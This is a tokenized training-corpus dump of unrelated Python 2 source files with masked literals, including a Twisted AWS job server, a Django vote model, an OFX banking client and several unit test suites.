getretriever_logo_liberationImage = retriever_logo_liberation . GetImage <EOL> getretriever_logo_liberationBitmap = retriever_logo_liberation . GetBitmap </s>
<s> import sys <EOL> from term_size import get_terminal_size <EOL> def get_columns ( values , cols ) : <EOL> columns = [ ] <EOL> col_size = len ( values ) / cols <EOL> extra = len ( values ) % cols <EOL> n = <NUM_LIT:0> <EOL> for i in range ( cols ) : <EOL> s = col_size <EOL> if i + <NUM_LIT:1> <= extra : <EOL> s += <NUM_LIT:1> <EOL> this_column = values [ n : n + s ] <EOL> columns . append ( this_column ) <EOL> n += s <EOL> return columns <EOL> def printls ( values , max_width = None , spacing = <NUM_LIT:2> ) : <EOL> if sys . stdout . isatty ( ) and max_width is None : <EOL> cols , lines = get_terminal_size ( ) <EOL> max_width = cols <EOL> if max_width : <EOL> for cols in [ int ( len ( values ) / float ( i ) + <NUM_LIT:0.5> ) for i in range ( <NUM_LIT:1> , len ( values ) + <NUM_LIT:1> ) ] : <EOL> columns = get_columns ( values , cols ) <EOL> widths = [ max ( [ len ( c ) for c in column ] ) + <EOL> spacing for column in columns ] <EOL> if sum ( widths ) < max_width : <EOL> break <EOL> for pos in range ( len ( columns [ <NUM_LIT:0> ] ) ) : <EOL> for column , width in zip ( columns , widths ) : <EOL> if len ( column ) > pos : <EOL> print column [ pos ] . ljust ( width - <NUM_LIT:1> ) , <EOL> print <EOL> else : <EOL> for value in values : <EOL> print value </s>
<s> v0_8 = '''<STR_LIT>''' </s>
<s> import pprint <EOL> from uuid import uuid4 <EOL> from twisted . internet . defer import Deferred , DeferredList , maybeDeferred <EOL> from twisted . web . resource import Resource <EOL> from twisted . internet import reactor <EOL> from twisted . web import server <EOL> from . base import BaseServer , LOGGER <EOL> from . . resources import InterfaceResource , ExposedResource <EOL> from . . aws import sdb_now <EOL> from . . evaluateboolean import evaluateBoolean <EOL> PRETTYPRINTER = pprint . PrettyPrinter ( indent = <NUM_LIT:4> ) <EOL> class InterfaceServer ( BaseServer ) : <EOL> exposed_functions = [ ] <EOL> exposed_function_resources = { } <EOL> def __init__ ( self , <EOL> aws_access_key_id , <EOL> aws_secret_access_key , <EOL> aws_sdb_reservation_domain , <EOL> aws_s3_reservation_cache_bucket = None , <EOL> aws_s3_http_cache_bucket = None , <EOL> aws_s3_storage_bucket = None , <EOL> aws_sdb_coordination_domain = None , <EOL> max_simultaneous_requests = <NUM_LIT:50> , <EOL> max_requests_per_host_per_second = <NUM_LIT:1> , <EOL> max_simultaneous_requests_per_host = <NUM_LIT:5> , <EOL> port = <NUM_LIT> , <EOL> log_file = '<STR_LIT>' , <EOL> log_directory = None , <EOL> log_level = "<STR_LIT>" , <EOL> name = None , <EOL> time_offset = None ) : <EOL> if name == None : <EOL> name = "<STR_LIT>" % self . uuid <EOL> resource = Resource ( ) <EOL> interface_resource = InterfaceResource ( self ) <EOL> resource . putChild ( "<STR_LIT>" , interface_resource ) <EOL> self . function_resource = Resource ( ) <EOL> resource . putChild ( "<STR_LIT>" , self . function_resource ) <EOL> self . site_port = reactor . listenTCP ( port , server . Site ( resource ) ) <EOL> BaseServer . __init__ ( <EOL> self , <EOL> aws_access_key_id , <EOL> aws_secret_access_key , <EOL> aws_s3_reservation_cache_bucket = aws_s3_reservation_cache_bucket , <EOL> aws_s3_http_cache_bucket = aws_s3_http_cache_bucket , <EOL> aws_sdb_reservation_domain = aws_sdb_reservation_domain , <EOL> aws_s3_storage_bucket = aws_s3_storage_bucket , <EOL> aws_sdb_coordination_domain = aws_sdb_coordination_domain , <EOL> max_simultaneous_requests = max_simultaneous_requests , <EOL> max_requests_per_host_per_second = max_requests_per_host_per_second , <EOL> max_simultaneous_requests_per_host = max_simultaneous_requests_per_host , <EOL> log_file = log_file , <EOL> log_directory = log_directory , <EOL> log_level = log_level , <EOL> name = name , <EOL> time_offset = time_offset , <EOL> port = port ) <EOL> def start ( self ) : <EOL> reactor . callWhenRunning ( self . _start ) <EOL> return self . start_deferred <EOL> def _start ( self ) : <EOL> deferreds = [ ] <EOL> if self . time_offset is None : <EOL> deferreds . append ( self . getTimeOffset ( ) ) <EOL> d = DeferredList ( deferreds , consumeErrors = True ) <EOL> d . addCallback ( self . _startCallback ) <EOL> def _startCallback ( self , data ) : <EOL> for row in data : <EOL> if row [ <NUM_LIT:0> ] == False : <EOL> d = self . shutdown ( ) <EOL> d . addCallback ( self . _startHandleError , row [ <NUM_LIT:1> ] ) <EOL> return d <EOL> d = BaseServer . start ( self ) <EOL> def shutdown ( self ) : <EOL> deferreds = [ ] <EOL> LOGGER . debug ( "<STR_LIT>" % self . name ) <EOL> d = self . site_port . stopListening ( ) <EOL> if isinstance ( d , Deferred ) : <EOL> deferreds . append ( d ) <EOL> if len ( deferreds ) > <NUM_LIT:0> : <EOL> d = DeferredList ( deferreds ) <EOL> d . addCallback ( self . _shutdownCallback ) <EOL> return d <EOL> else : <EOL> return self . _shutdownCallback ( None ) <EOL> def _shutdownCallback ( self , data ) : <EOL> return BaseServer . shutdown ( self ) <EOL> def makeCallable ( self , func , interval = <NUM_LIT:0> , name = None , expose = False ) : <EOL> function_name = BaseServer . makeCallable ( <EOL> self , <EOL> func , <EOL> interval = interval , <EOL> name = name , <EOL> expose = expose ) <EOL> if expose : <EOL> self . exposed_functions . append ( function_name ) <EOL> er = ExposedResource ( self , function_name ) <EOL> function_name_parts = function_name . split ( "<STR_LIT:/>" ) <EOL> if len ( function_name_parts ) > <NUM_LIT:1> : <EOL> if function_name_parts [ <NUM_LIT:0> ] in self . exposed_function_resources : <EOL> r = self . exposed_function_resources [ function_name_parts [ <NUM_LIT:0> ] ] <EOL> else : <EOL> r = Resource ( ) <EOL> self . exposed_function_resources [ function_name_parts [ <NUM_LIT:0> ] ] = r <EOL> self . function_resource . putChild ( function_name_parts [ <NUM_LIT:0> ] , r ) <EOL> r . putChild ( function_name_parts [ <NUM_LIT:1> ] , er ) <EOL> else : <EOL> self . function_resource . putChild ( function_name_parts [ <NUM_LIT:0> ] , er ) <EOL> LOGGER . info ( "<STR_LIT>" % function_name ) <EOL> def createReservation ( self , function_name , ** kwargs ) : <EOL> if not isinstance ( function_name , str ) : <EOL> for key in self . functions : <EOL> if self . functions [ key ] [ "<STR_LIT>" ] == function_name : <EOL> function_name = key <EOL> break <EOL> if function_name not in self . functions : <EOL> raise Exception ( "<STR_LIT>" % function_name ) <EOL> function = self . functions [ function_name ] <EOL> filtered_kwargs = { } <EOL> for key in function [ "<STR_LIT>" ] : <EOL> if key in kwargs : <EOL> filtered_kwargs [ key ] = kwargs [ key ] <EOL> else : <EOL> raise Exception ( "<STR_LIT>" % ( key , function [ "<STR_LIT>" ] , function [ "<STR_LIT>" ] ) ) <EOL> for key in function [ "<STR_LIT>" ] : <EOL> if key in kwargs : <EOL> filtered_kwargs [ key ] = kwargs [ key ] <EOL> if function [ "<STR_LIT>" ] > <NUM_LIT:0> : <EOL> reserved_arguments = { } <EOL> reserved_arguments [ "<STR_LIT>" ] = function_name <EOL> reserved_arguments [ "<STR_LIT>" ] = sdb_now ( offset = self . time_offset ) <EOL> reserved_arguments [ "<STR_LIT>" ] = reserved_arguments [ "<STR_LIT>" ] <EOL> reserved_arguments [ "<STR_LIT>" ] = "<STR_LIT:0>" <EOL> arguments = { } <EOL> arguments . update ( reserved_arguments ) <EOL> arguments . update ( filtered_kwargs ) <EOL> uuid = uuid4 ( ) . hex <EOL> LOGGER . debug ( "<STR_LIT>" % ( function_name , uuid ) ) <EOL> a = self . sdb . putAttributes ( self . aws_sdb_reservation_domain , uuid , arguments ) <EOL> a . addCallback ( self . _createReservationCallback , function_name , uuid ) <EOL> a . addErrback ( self . _createReservationErrback , function_name , uuid ) <EOL> if "<STR_LIT>" in kwargs and not evaluateBoolean ( kwargs [ "<STR_LIT>" ] ) : <EOL> d = DeferredList ( [ a ] , consumeErrors = True ) <EOL> else : <EOL> LOGGER . debug ( "<STR_LIT>" % ( function_name , PRETTYPRINTER . pformat ( filtered_kwargs ) ) ) <EOL> self . active_jobs [ uuid ] = True <EOL> b = self . callExposedFunction ( function [ "<STR_LIT>" ] , filtered_kwargs , function_name , uuid = uuid ) <EOL> d = DeferredList ( [ a , b ] , consumeErrors = True ) <EOL> d . addCallback ( self . _createReservationCallback2 , function_name , uuid ) <EOL> d . addErrback ( self . _createReservationErrback2 , function_name , uuid ) <EOL> return d <EOL> else : <EOL> LOGGER . debug ( "<STR_LIT>" % ( function_name , PRETTYPRINTER . pformat ( filtered_kwargs ) ) ) <EOL> d = self . callExposedFunction ( function [ "<STR_LIT>" ] , filtered_kwargs , function_name ) <EOL> return d <EOL> def _createReservationCallback ( self , data , function_name , uuid ) : <EOL> LOGGER . error ( data ) <EOL> LOGGER . debug ( "<STR_LIT>" % ( function_name , uuid ) ) <EOL> return uuid <EOL> def _createReservationErrback ( self , error , function_name , uuid ) : <EOL> LOGGER . error ( "<STR_LIT>" % ( function_name , uuid , error ) ) <EOL> return error <EOL> def _createReservationCallback2 ( self , data , function_name , uuid ) : <EOL> for row in data : <EOL> if row [ <NUM_LIT:0> ] == False : <EOL> raise row [ <NUM_LIT:1> ] <EOL> if len ( data ) == <NUM_LIT:1> : <EOL> return { data [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] : { } } <EOL> else : <EOL> return { data [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] : data [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] } <EOL> def _createReservationErrback2 ( self , error , function_name , uuid ) : <EOL> LOGGER . error ( "<STR_LIT>" % ( function_name , uuid , error ) ) <EOL> return error <EOL> def showReservation ( self , uuid ) : <EOL> d = self . sdb . getAttributes ( self . aws_sdb_reservation_domain , uuid ) <EOL> return d <EOL> def executeReservation ( self , uuid ) : <EOL> sql = "<STR_LIT>" % ( self . aws_sdb_reservation_domain , uuid ) <EOL> LOGGER . debug ( "<STR_LIT>" % sql ) <EOL> d = self . sdb . select ( sql ) <EOL> d . addCallback ( self . _executeReservationCallback ) <EOL> d . addErrback ( self . _executeReservationErrback ) <EOL> return d <EOL> def _executeReservationCallback ( self , data ) : <EOL> if len ( data ) == <NUM_LIT:0> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> uuid = data . keys ( ) [ <NUM_LIT:0> ] <EOL> kwargs_raw = { } <EOL> reserved_arguments = { } <EOL> for key in data [ uuid ] : <EOL> if key in self . reserved_arguments : <EOL> reserved_arguments [ key ] = data [ uuid ] [ key ] [ <NUM_LIT:0> ] <EOL> else : <EOL> kwargs_raw [ key ] = data [ uuid ] [ key ] [ <NUM_LIT:0> ] <EOL> function_name = reserved_arguments [ "<STR_LIT>" ] <EOL> if function_name not in self . functions : <EOL> raise Exception ( "<STR_LIT>" % ( function_name , uuid ) ) <EOL> return <EOL> if "<STR_LIT>" not in reserved_arguments : <EOL> self . deleteReservation ( uuid ) <EOL> raise Exception ( "<STR_LIT>" % uuid ) <EOL> if "<STR_LIT>" not in reserved_arguments : <EOL> self . deleteReservation ( uuid , function_name = function_name ) <EOL> raise Exception ( "<STR_LIT>" % ( function_name , uuid ) ) <EOL> if "<STR_LIT>" not in reserved_arguments : <EOL> self . deleteReservation ( uuid , function_name = function_name ) <EOL> raise Exception ( "<STR_LIT>" % ( function_name , uuid ) ) <EOL> if "<STR_LIT>" not in reserved_arguments : <EOL> self . deleteReservation ( uuid , function_name = function_name ) <EOL> raise Exception ( "<STR_LIT>" % ( function_name , uuid ) ) <EOL> if function_name in self . functions : <EOL> exposed_function = self . functions [ function_name ] <EOL> else : <EOL> raise Exception ( "<STR_LIT>" % function_name ) <EOL> return <EOL> kwargs = { } <EOL> for key in kwargs_raw : <EOL> if key in exposed_function [ "<STR_LIT>" ] : <EOL> kwargs [ key ] = kwargs_raw [ key ] <EOL> if key in exposed_function [ "<STR_LIT>" ] : <EOL> kwargs [ key ] = kwargs_raw [ key ] <EOL> has_reqiured_arguments = True <EOL> for key in exposed_function [ "<STR_LIT>" ] : <EOL> if key not in kwargs : <EOL> has_reqiured_arguments = False <EOL> raise Exception ( "<STR_LIT>" % ( function_name , uuid , key ) ) <EOL> LOGGER . debug ( "<STR_LIT>" % function_name ) <EOL> return self . callExposedFunction ( exposed_function [ "<STR_LIT>" ] , kwargs , function_name , uuid = uuid ) <EOL> def _executeReservationErrback ( self , error ) : <EOL> LOGGER . error ( "<STR_LIT>" % error ) </s>
<s> from twisted . trial import unittest <EOL> from twisted . internet import reactor <EOL> from twisted . internet . defer import Deferred <EOL> import os <EOL> import sys <EOL> sys . path . append ( os . path . join ( os . path . dirname ( __file__ ) , "<STR_LIT>" ) ) <EOL> import twisted <EOL> twisted . internet . base . DelayedCall . debug = True <EOL> from awspider . networkaddress import NetworkAddressGetter , getNetworkAddress <EOL> import re <EOL> class NetworkAddressTestCase ( unittest . TestCase ) : <EOL> def testGetNetworkAddress ( self ) : <EOL> d = getNetworkAddress ( ) <EOL> d . addCallback ( self . _testGetNetworkAddressCallback ) <EOL> return d <EOL> def _testGetNetworkAddressCallback ( self , result ) : <EOL> if "<STR_LIT>" in result : <EOL> self . _checkIP ( result [ "<STR_LIT>" ] ) <EOL> if "<STR_LIT>" in result : <EOL> self . _checkIP ( result [ "<STR_LIT>" ] ) <EOL> if "<STR_LIT>" not in result and "<STR_LIT>" not in result : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> def testNetworkAddressGetter ( self ) : <EOL> n = NetworkAddressGetter ( ) <EOL> d = n ( ) <EOL> d . addCallback ( self . _testGetNetworkAddressCallback ) <EOL> return d <EOL> def testGetPublicIP ( self ) : <EOL> n = NetworkAddressGetter ( ) <EOL> d = n . getPublicIP ( ) <EOL> d . addCallback ( self . _testGetNetworkAddressCallback ) <EOL> return d <EOL> def testGetAmazonIPs ( self ) : <EOL> n = NetworkAddressGetter ( ) <EOL> d = n . getAmazonIPs ( ) <EOL> d . addCallback ( self . _testGetNetworkAddressCallback ) <EOL> return d <EOL> def testGetIPPages ( self ) : <EOL> n = NetworkAddressGetter ( ) <EOL> d = n . getIPPages ( ) <EOL> d . addCallback ( self . _checkIP ) <EOL> return d <EOL> def testGetDomaintools ( self ) : <EOL> n = NetworkAddressGetter ( ) <EOL> d = n . getDomaintools ( ) <EOL> d . addCallback ( self . _checkIP ) <EOL> return d <EOL> def _checkIP ( self , s ) : <EOL> ip_address_regex = r"<STR_LIT>" <EOL> if len ( re . findall ( ip_address_regex , s ) ) != <NUM_LIT:1> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> return True </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> from django . db import models <EOL> from django . contrib . contenttypes . models import ContentType <EOL> from django . contrib . contenttypes . fields import GenericForeignKey <EOL> from django . conf import settings <EOL> from django . utils import timezone <EOL> _SCORE_TYPE_CHOICES = ( <EOL> ( - <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> ) <EOL> SCORE_TYPES = dict ( ( value , key ) for key , value in _SCORE_TYPE_CHOICES ) <EOL> class Vote ( models . Model ) : <EOL> content_type = models . ForeignKey ( ContentType , related_name = "<STR_LIT>" ) <EOL> object_id = models . PositiveIntegerField ( ) <EOL> key = models . CharField ( max_length = <NUM_LIT:32> ) <EOL> score = models . SmallIntegerField ( choices = _SCORE_TYPE_CHOICES ) <EOL> user = models . ForeignKey ( settings . AUTH_USER_MODEL , blank = True , null = True , <EOL> related_name = "<STR_LIT>" ) <EOL> ip_address = models . GenericIPAddressField ( ) <EOL> date_added = models . DateTimeField ( default = timezone . now , editable = False ) <EOL> date_changed = models . DateTimeField ( default = timezone . now , editable = False ) <EOL> content_object = GenericForeignKey ( ) <EOL> class Meta : <EOL> unique_together = ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:key>' , '<STR_LIT:user>' , <EOL> '<STR_LIT>' ) ) <EOL> def __unicode__ ( self ) : <EOL> return u"<STR_LIT>" % ( self . user , self . score , <EOL> self . content_object ) <EOL> def save ( self , * args , ** kwargs ) : <EOL> self . date_changed = timezone . now ( ) <EOL> super ( Vote , self ) . save ( * args , ** kwargs ) <EOL> def partial_ip_address ( self ) : <EOL> ip = self . ip_address . split ( '<STR_LIT:.>' ) <EOL> ip [ - <NUM_LIT:1> ] = '<STR_LIT>' <EOL> return '<STR_LIT:.>' . join ( ip ) <EOL> partial_ip_address = property ( partial_ip_address ) </s>
<s> import mock <EOL> from werckercli . tests import TestCase <EOL> from werckercli . commands import update <EOL> class UpdateTests ( TestCase ) : <EOL> LOW_VERSION = '<STR_LIT>' <EOL> HIGH_VERSION = '<STR_LIT>' <EOL> @ mock . patch ( "<STR_LIT>" , mock . Mock ( ) ) <EOL> def test_newer_version ( self ) : <EOL> self . assertTrue ( update . update ( self . LOW_VERSION ) ) <EOL> @ mock . patch ( "<STR_LIT>" , mock . Mock ( ) ) <EOL> def test_not_newer_version ( self ) : <EOL> self . assertFalse ( update . update ( self . HIGH_VERSION ) ) </s>
<s> from wsgi_intercept import httplib2_intercept <EOL> from nose . tools import with_setup , raises , eq_ <EOL> from socket import gaierror <EOL> import wsgi_intercept <EOL> from wsgi_intercept import test_wsgi_app <EOL> import httplib2 <EOL> _saved_debuglevel = None <EOL> def install ( port = <NUM_LIT> ) : <EOL> _saved_debuglevel , wsgi_intercept . debuglevel = wsgi_intercept . debuglevel , <NUM_LIT:1> <EOL> httplib2_intercept . install ( ) <EOL> wsgi_intercept . add_wsgi_intercept ( '<STR_LIT>' , port , test_wsgi_app . create_fn ) <EOL> def uninstall ( ) : <EOL> wsgi_intercept . debuglevel = _saved_debuglevel <EOL> httplib2_intercept . uninstall ( ) <EOL> @ with_setup ( install , uninstall ) <EOL> def test_success ( ) : <EOL> http = httplib2 . Http ( ) <EOL> resp , content = http . request ( '<STR_LIT>' , '<STR_LIT:GET>' ) <EOL> eq_ ( content , "<STR_LIT>" ) <EOL> assert test_wsgi_app . success ( ) <EOL> @ with_setup ( install , uninstall ) <EOL> @ raises ( gaierror ) <EOL> def test_bogus_domain ( ) : <EOL> wsgi_intercept . debuglevel = <NUM_LIT:1> ; <EOL> httplib2_intercept . HTTP_WSGIInterceptorWithTimeout ( "<STR_LIT>" ) . connect ( ) <EOL> @ with_setup ( lambda : install ( <NUM_LIT> ) , uninstall ) <EOL> def test_https_success ( ) : <EOL> http = httplib2 . Http ( ) <EOL> resp , content = http . request ( '<STR_LIT>' , '<STR_LIT:GET>' ) <EOL> assert test_wsgi_app . success ( ) </s>
<s> import ofx <EOL> import urllib2 <EOL> class Client : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , debug = False ) : <EOL> """<STR_LIT>""" <EOL> self . request_msg = None <EOL> self . debug = debug <EOL> def get_fi_profile ( self , institution , <EOL> username = "<STR_LIT>" , <EOL> password = "<STR_LIT>" ) : <EOL> request = ofx . Request ( ) <EOL> self . request_msg = request . fi_profile ( institution , username , password ) <EOL> return self . _send_request ( institution . ofx_url , self . request_msg ) <EOL> def get_account_info ( self , institution , username , password ) : <EOL> request = ofx . Request ( ) <EOL> self . request_msg = request . account_info ( institution , username , password ) <EOL> return self . _send_request ( institution . ofx_url , self . request_msg ) <EOL> def get_statement ( self , account , username , password ) : <EOL> acct_type = account . get_ofx_accttype ( ) <EOL> if acct_type == "<STR_LIT>" : <EOL> return self . get_creditcard_statement ( account , username , password ) <EOL> elif acct_type == "<STR_LIT>" or acct_type == "<STR_LIT>" or acct_type == "<STR_LIT>" or acct_type == "<STR_LIT>" or acct_type == "<STR_LIT>" : <EOL> return self . get_bank_statement ( account , username , password ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % acct_type ) <EOL> def get_bank_statement ( self , account , username , password ) : <EOL> """<STR_LIT>""" <EOL> request = ofx . Request ( ) <EOL> try : <EOL> self . request_msg = request . bank_stmt ( account , username , password , daysago = <NUM_LIT> ) <EOL> return self . _send_request ( account . institution . ofx_url , self . request_msg ) <EOL> except ofx . Error , detail : <EOL> try : <EOL> self . request_msg = request . bank_stmt ( account , username , password , daysago = <NUM_LIT> ) <EOL> return self . _send_request ( account . institution . ofx_url , self . request_msg ) <EOL> except ofx . Error , detail : <EOL> self . request_msg = request . bank_stmt ( account , username , password , daysago = <NUM_LIT:30> ) <EOL> return self . _send_request ( account . institution . ofx_url , self . request_msg ) <EOL> def get_creditcard_statement ( self , account , username , password ) : <EOL> """<STR_LIT>""" <EOL> request = ofx . Request ( ) <EOL> try : <EOL> self . request_msg = request . creditcard_stmt ( account , username , password , daysago = <NUM_LIT> ) <EOL> return self . _send_request ( account . institution . ofx_url , self . request_msg ) <EOL> except ofx . Error , detail : <EOL> try : <EOL> self . request_msg = request . creditcard_stmt ( account , username , password , daysago = <NUM_LIT> ) <EOL> return self . _send_request ( account . institution . ofx_url , self . request_msg ) <EOL> except ofx . Error , detail : <EOL> self . request_msg = request . creditcard_stmt ( account , username , password , daysago = <NUM_LIT:30> ) <EOL> return self . _send_request ( account . institution . ofx_url , self . request_msg ) <EOL> def get_closing ( self , account , username , password ) : <EOL> acct_type = account . get_ofx_accttype ( ) <EOL> if acct_type == "<STR_LIT>" : <EOL> return self . get_creditcard_closing ( account , username , password ) <EOL> elif acct_type == "<STR_LIT>" or acct_type == "<STR_LIT>" or acct_type == "<STR_LIT>" or acct_type == "<STR_LIT>" or acct_type == "<STR_LIT>" : <EOL> return self . get_bank_closing ( account , username , password ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % acct_type ) <EOL> def get_bank_closing ( self , account , username , password ) : <EOL> """<STR_LIT>""" <EOL> acct_type = account . get_ofx_accttype ( ) <EOL> request = ofx . Request ( ) <EOL> self . request_msg = request . bank_closing ( account , username , password ) <EOL> return self . _send_request ( account . institution . ofx_url , self . request_msg ) <EOL> def get_creditcard_closing ( self , account , username , password ) : <EOL> """<STR_LIT>""" <EOL> request = ofx . Request ( ) <EOL> self . request_msg = request . creditcard_closing ( account , username , password ) <EOL> return self . _send_request ( account . institution . ofx_url , self . request_msg ) <EOL> def get_request_message ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . request_msg <EOL> def _send_request ( self , url , request_body ) : <EOL> """<STR_LIT>""" <EOL> request = urllib2 . Request ( url , request_body , <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } ) <EOL> stream = urllib2 . urlopen ( request ) <EOL> response = stream . read ( ) <EOL> stream . close ( ) <EOL> if self . debug : <EOL> print response <EOL> response = ofx . Response ( response ) <EOL> response . check_signon_status ( ) <EOL> parsed_ofx = response . as_dict ( ) <EOL> if parsed_ofx . has_key ( "<STR_LIT>" ) : <EOL> bank_status = parsed_ofx [ "<STR_LIT>" ] [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> self . _check_status ( bank_status , "<STR_LIT>" ) <EOL> elif parsed_ofx . has_key ( "<STR_LIT>" ) : <EOL> creditcard_status = parsed_ofx [ "<STR_LIT>" ] [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> self . _check_status ( creditcard_status , "<STR_LIT>" ) <EOL> elif parsed_ofx . has_key ( "<STR_LIT>" ) : <EOL> acctinfo_status = parsed_ofx [ "<STR_LIT>" ] [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> self . _check_status ( acctinfo_status , "<STR_LIT>" ) <EOL> return response <EOL> def _check_status ( self , status_block , description ) : <EOL> status = status_block . asDict ( ) <EOL> code = status . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if code is not "<STR_LIT:0>" and code is not "<STR_LIT:1>" : <EOL> severity = status . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> message = status . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> error = ofx . Error ( description , code , severity , message ) <EOL> raise error </s>
<s> import sys <EOL> sys . path . insert ( <NUM_LIT:0> , '<STR_LIT>' ) <EOL> sys . path . insert ( <NUM_LIT:0> , '<STR_LIT>' ) <EOL> import ofxtools <EOL> import textwrap <EOL> import unittest <EOL> from pyparsing import ParseException <EOL> from time import localtime , strftime <EOL> class QifConverterTests ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> pass <EOL> def test_bank_stmttype ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> self . assertEqual ( converter . accttype , "<STR_LIT>" ) <EOL> def test_ccard_stmttype ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> self . assertEqual ( converter . accttype , "<STR_LIT>" ) <EOL> def test_no_stmttype ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> self . assertEqual ( converter . accttype , "<STR_LIT>" ) <EOL> def test_no_txns ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> today = strftime ( "<STR_LIT>" , localtime ( ) ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> self . assertEqual ( converter . start_date , today ) <EOL> self . assertEqual ( converter . end_date , today ) <EOL> def test_us_date ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> self . assertTrue ( converter . txns_by_date . has_key ( "<STR_LIT>" ) ) <EOL> def test_uk_date ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> self . assertTrue ( converter . txns_by_date . has_key ( "<STR_LIT>" ) ) <EOL> def test_ambiguous_date ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> self . assertTrue ( converter . txns_by_date . has_key ( "<STR_LIT>" ) ) <EOL> def test_mixed_us_dates ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> self . assertTrue ( converter . txns_by_date . has_key ( "<STR_LIT>" ) ) <EOL> self . assertTrue ( converter . txns_by_date . has_key ( "<STR_LIT>" ) ) <EOL> def test_mixed_uk_dates ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> self . assertTrue ( converter . txns_by_date . has_key ( "<STR_LIT>" ) ) <EOL> self . assertTrue ( converter . txns_by_date . has_key ( "<STR_LIT>" ) ) <EOL> def test_slashfree_date ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> self . assertTrue ( converter . txns_by_date . has_key ( "<STR_LIT>" ) ) <EOL> def test_unparseable_date ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> self . assertRaises ( ValueError , ofxtools . QifConverter , qiftext ) <EOL> def test_len_eight_no_int_date ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> self . assertRaises ( ValueError , ofxtools . QifConverter , qiftext ) <EOL> def test_asc_dates ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> self . assertEqual ( converter . start_date , "<STR_LIT>" ) <EOL> self . assertEqual ( converter . end_date , "<STR_LIT>" ) <EOL> self . assertEqual ( len ( converter . txns_by_date . keys ( ) ) , <NUM_LIT:4> ) <EOL> def test_desc_dates ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> self . assertEqual ( converter . start_date , "<STR_LIT>" ) <EOL> self . assertEqual ( converter . end_date , "<STR_LIT>" ) <EOL> self . assertEqual ( len ( converter . txns_by_date . keys ( ) ) , <NUM_LIT:4> ) <EOL> def test_mixed_dates ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> self . assertEqual ( converter . start_date , "<STR_LIT>" ) <EOL> self . assertEqual ( converter . end_date , "<STR_LIT>" ) <EOL> self . assertEqual ( len ( converter . txns_by_date . keys ( ) ) , <NUM_LIT:4> ) <EOL> def test_default_currency ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> ofx102 = converter . to_ofx102 ( ) <EOL> self . assertTrue ( ofx102 . find ( '<STR_LIT>' ) != - <NUM_LIT:1> ) <EOL> def test_found_currency ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> ofx102 = converter . to_ofx102 ( ) <EOL> self . assertTrue ( ofx102 . find ( '<STR_LIT>' ) != - <NUM_LIT:1> ) <EOL> def test_explicit_currency ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext , curdef = '<STR_LIT>' ) <EOL> ofx102 = converter . to_ofx102 ( ) <EOL> self . assertTrue ( ofx102 . find ( '<STR_LIT>' ) != - <NUM_LIT:1> ) <EOL> def test_amount2 ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter = ofxtools . QifConverter ( qiftext ) <EOL> txn = converter . txns_by_date [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> self . assertEqual ( txn [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def test_bad_amount_precision ( self ) : <EOL> qiftext = textwrap . dedent ( '''<STR_LIT>''' ) <EOL> converter 